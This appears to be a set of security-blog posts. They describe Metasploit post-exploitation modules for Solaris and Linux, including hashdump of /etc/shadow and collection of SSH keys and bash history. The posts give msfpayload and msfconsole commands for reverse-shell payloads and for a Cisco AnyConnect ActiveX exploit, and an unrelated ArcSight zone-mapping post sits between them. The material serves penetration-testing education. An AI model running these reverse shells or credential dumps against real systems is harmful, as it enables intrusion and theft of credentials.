A new set of post exploitation scripts have been developed and integrated in the Metasploit framework repository. These scripts permit you to gather interesting information’s on a Solaris target. These Metasploit post exploitation scripts are supporting all Solaris versions. For the moment are only working with a “shell” session but Metasploit team is working on a version how is supporting a complete integration with meterpreter.
Solaris enum_packages post exploitation script
This module will focus on installed softwares. Execution of “/usr/bin/pkginfo -l” and export off all results in “$HOME/.msf3/loot/” folder.
Solaris enum_packages post exploitation script
Solaris enum_services post exploitation script
This module will focus on installed services. Execution of “/usr/bin/svcs -a” and export off all results in “$HOME/.msf3/loot/” folder.
Solaris enum_services post exploitation script
Solaris hashdump post exploitation script
This module will gather “/etc/password” and “/etc/shadow” files and export off all results in “$HOME/.msf3/loot/” folder.
Solaris hashdump post exploitation script
Solaris checkvm post exploitation script
This module will attempt to determine wether the targeted system is running inside of a virtual environment and will provide you the type of virtualization technology how is used. This module supports detection of Hyper-V, VMWare, VirtualBox, Xen, and QEMU/KVM.
Solaris checkvm post exploitation script
To test these scripts you only need to create an executable payload for Solaris and follow these steps.
First create the payload with msfpayload and upload it to the targeted Solaris.
sudo msfpayload cmd/unix/reverse_perl LHOST=192.168.178.21 LPORT=4444 X > payload
Then in msfconsole, run the following commands.
use exploit/multi/handler
set PAYLOAD cmd/unix/reverse_perl
set LHOST 192.168.178.21
exploit -j
After on the targeted Solaris, execute the payload script.
Once you have install and configure your SYSLOG ArcSight SmartConnector to communicate with your free L750MB Logger, you can customize “zones mapping” for all devices how will communicate with the SmartConnector. In CEF (Common Event Format) standard, the device zone is classified under “deviceZoneURI” and the SmartConnector zone is classified under “agentZoneURI“.
A zone represent a part of your network with contiguous IP addresses, for example LAN, DMZ, VPN, WIFI. If you customize your devices “zones mapping“, you will able to create, with your Logger, alerts, queries and reports for group of devices how are in the same zone. This will save you time 🙂
An ArcSight SmartConnector zone is represented by :
A starting IP address (for example : 192.168.0.15)
A ending IP address (for example : 192.168.0.20)
A zone name (for example : /All Zones/Office Zones/Printers)
The zone will be represented by this uncommented line :
In order to customize your devices “zones mapping“, you only have edit the “defaultzones.csv” file located in “$ARCSIGHT_HOME/current/user/agent/acp/” directory.
A new set of post exploitation scripts have been developed and integrated in the Metasploit framework repository. These scripts permit you to gather interesting information’s on a Linux target.
These Metasploit post exploitation scripts are normally supporting all Linux distributions. For the moment are only working with a “shell” session but Metasploit team is working on a version how is supporting a complete integration with meterpreter.
Linux enum_linux post exploitation script
This script will permit you to gather different datas from the target :
Hostname of the target.
Current running system user.
Linux distribution and version.
Complete running kernel version
Complete system users from “/etc/password”
Network configuration from “/sbin/ifconfig -a” command.
The routing configuration from “/sbin/route” command
All mounted drives list from the “/bin/mount -l” command.
Complete “iptables -L” command output. The “nat” and “mangle” tables are also gather with the “iptables -L -t nat” and “iptables -L -t mangle” commands.
DNS configuration from “/etc/resolv.conf“
SSH server configuration from “/etc/ssh/sshd_config“
Statics hosts entries from “/etc/hosts“
Complete output of “/etc/password” file
Possible ssh keys located in “.ssh” folders on the entire system.
Installed softwares. Execution of “rpm -qa” for Fedora, Red Hat, SuSe, Mandrake and Oracle. Execution of “ls /var/log/packages” for Slackware. Execution of “dpkg -l” for Ubuntu and Debian. Execution of “equery list” for Gentoo. Execution of “/usr/bin/pacman -Q” for ArcLinux.
Installed services. Execution of “chkconfig –list” for Fedora, Red Hat, SuSe, Mandrake and Oracle. Some logfu commands for Mandrake. Execution of “/usr/bin/service –status-all” for Ubuntu and Debian. Execution of “/bin/rc-status –all” for Gentoo.
Possible “.bash_history” files located in each users home folder.
Also the module will try to do a screenshot of display “0:0” with the xwd command.
All these datas are transfered on your Metasploit box for further analysis. All gathered information’s are saved into a “loot/date” folder located into your “$HOME/.msf3” folder.
Linux enum_linux post exploitation script
Linux enum_packages post exploitation script
This module is a sub module how will only focus on installed softwares. Execution of “rpm -qa” for Fedora, Red Hat, SuSe, Mandrake and Oracle. Execution of “ls /var/log/packages” for Slackware. Execution of “dpkg -l” for Ubuntu and Debian. Execution of “equery list” for Gentoo. Execution of “/usr/bin/pacman -Q” for ArcLinux
Linux enum_packages post exploitation script
Linux enum_services post exploitation script
This module is a sub module how will only focus on installed services. Execution of “chkconfig –list” for Fedora, Red Hat, SuSe , Mandrake and Oracle. Some logfu commands for Mandrake. Execution of “/usr/bin/service –status-all” for Ubuntu and Debian. Execution of “/bin/rc-status –all” for Gentoo.
Linux enum_services post exploitation script
Linux hashdump post exploitation script
This module will gather “/etc/password” and “/etc/shadow” files.
Linux enum_services post exploitation script
Linux enum_cron post exploitation script
This module will enumerate cron jobs for all users on the system by executing the command “crontab -u #{user} -l” where “#{user}” is the user enumerated from “/etc/passwd” file.
Metasploit Linux enum_cron module
Linux checkvm post exploitation script
This module will attempt to determine wether the targeted system is running inside of a virtual environment and will provide you the type of virtualization technology how is used. This module supports detection of Hyper-V, VMWare, VirtualBox, Xen, and QEMU/KVM. All informations are gathered by looking for virtualization informations with “/sbin/lsmod“, “dmesg” and “cat /proc/scsi/scsi” commands.
Linux checkvm post exploitation script
To test these scripts you only need to create an executable payload for Linux and follow these steps.
First create the payload with msfpayload and upload it to the targeted Linux.
sudo msfpayload linux/x86/shell_reverse_tcp LHOST=192.168.178.21 LPORT=4444 X > test
Then in msfconsole, run the following commands.
use exploit/multi/handler
set PAYLOAD linux/x86/shell_reverse_tcp
set LHOST 192.168.178.21
exploit -j
After on the targeted Linux, execute the test payload
Vulnerability discovered by Elazar Broad and submitted to iDefense Labs
Initial vulnerability notification to Cisco the 2009-02-24
Public release of Cisco Security Advisory 2011-06-01
Metasploit PoC provided by bannedit the 2011-06-06
For Windows all versions prior to 2.3.185
For Linux, Apple Mac OS X all versions in major releases other than 2.5.x and 3.0.x
2.5.x releases prior to 2.5.3041
3.0.x releases prior to 3.0.629
Microsoft Windows Mobile versions are affected, but no updated are planned.
Tested on Windows XP SP3 with :
With Cisco AnyConnect VPN Client 2.0.0343
Description :
This module exploits a vulnerability in the Cisco AnyConnect VPN client vpnweb.ocx ActiveX control. This control is typically used to install the VPN client. An attacker can set the ‘url’ property which is where the control tries to locate the files needed to install the client. The control tries to download two files from the site specified within the ‘url’ property. One of these files it will be stored in a temporary directory and executed.
Commands :
use exploit/windows/browser/cisco_anyconnect_exec
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
